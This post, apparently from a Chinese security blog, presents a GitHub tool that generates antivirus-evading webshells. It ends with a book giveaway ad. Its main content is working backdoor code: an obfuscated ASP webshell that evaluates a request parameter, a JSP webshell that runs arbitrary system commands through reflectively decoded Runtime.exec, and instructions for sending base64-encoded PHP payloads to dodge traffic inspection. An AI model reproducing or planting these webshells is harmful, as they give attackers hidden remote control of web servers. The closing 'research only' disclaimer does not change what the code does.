项目作者:
项目地址:https://github.com/rexSurprise/webshell-free
0x01 工具介绍
webshell免杀案例。
0x02 安装与使用
python3 asp-venom.py //生成
python3 asp-venom.py > test.asp //保存
示例代码
<%
<!--
Function Hsnh(Bjhu):
Bjhu = Split(Bjhu,"|")
For x=1 To Ubound(Bjhu)
Hsnh=Hsnh&Chr(Bjhu(x)-31)
Next
End Function
EXecutE(Hsnh("|132|149|128|139|63|145|132|144|148|132|146|147|71|65|152|153|131|131|140|145|85|65|72"))
-->
%>
python3 php_venom_3.3.py //生成免杀一句话
python3 php_venom_3.3.py shell.php //对同目录下shell.php进行免杀处理,结果保存在shell.php.bypass.php
3.x 使用说明:
是否传入id参数决定是否把流量编码
http://www.xxx.com/shell.php
POST: mr6=phpinfo(); //与普通shell相同
http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)
POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码
python3 jsp-venom.py //生成
python3 jsp-venom.py > test.jsp //保存
生成样例
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%!public String vADM(String mPk){String BJM="";for (int i = 0; i < mPk.length(); i++) {BJM+=(char)(mPk.charAt(i)+-4);}return BJM;}
%>
<% String sbd=request.getParameter("websafe");if(sbd!=null){ Class cjwV = Class.forName(vADM("neze2perk2Vyrxmqi"));
Process rsSk = (Process) cjwV.getMethod(vADM("i|ig"), String.class).invoke(cjwV.getMethod(vADM("kixVyrxmqi")).invoke(null),sbd); java.io.InputStream in = rsSk.getInputStream();byte[] iLT = new byte[2048];out.print("<pre>");while(in.read(iLT)!=-1){ out.println(new String(iLT)); }out.print("</pre>"); }
%>
0x03 下载地址
1、通过项目地址下载
0x04 声明
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
推 荐 阅 读
加我微信:ivu123ivu,进送书活动群,不定时免费送书
《代码大全2(纪念版)》
《代码大全2(纪念版)》作为名家经典著作,是一本完整的软件构建手册,涵盖软件构建过程中的所有细节。它从软件质量和编程思想等方面论述软件构建的各个主题,并详细论述主流的新技术、高屋建瓴的观点和通用的概念,还含有丰富而典型的程序示例。本书所论述的技术不仅填补了初级与中高级编程技术之间的空白,同时还为程序员提供了一个有关编程技巧的信息来源。《代码大全2(纪念版)》对经验丰富的程序员、技术带头人、自学的程序员及几乎不懂太多编程技巧的学生大有帮助。无论是什么背景的读者,都可以通过阅读和领会本书,在更短的时间内更轻松地写出更好、更简洁和更优雅的程序。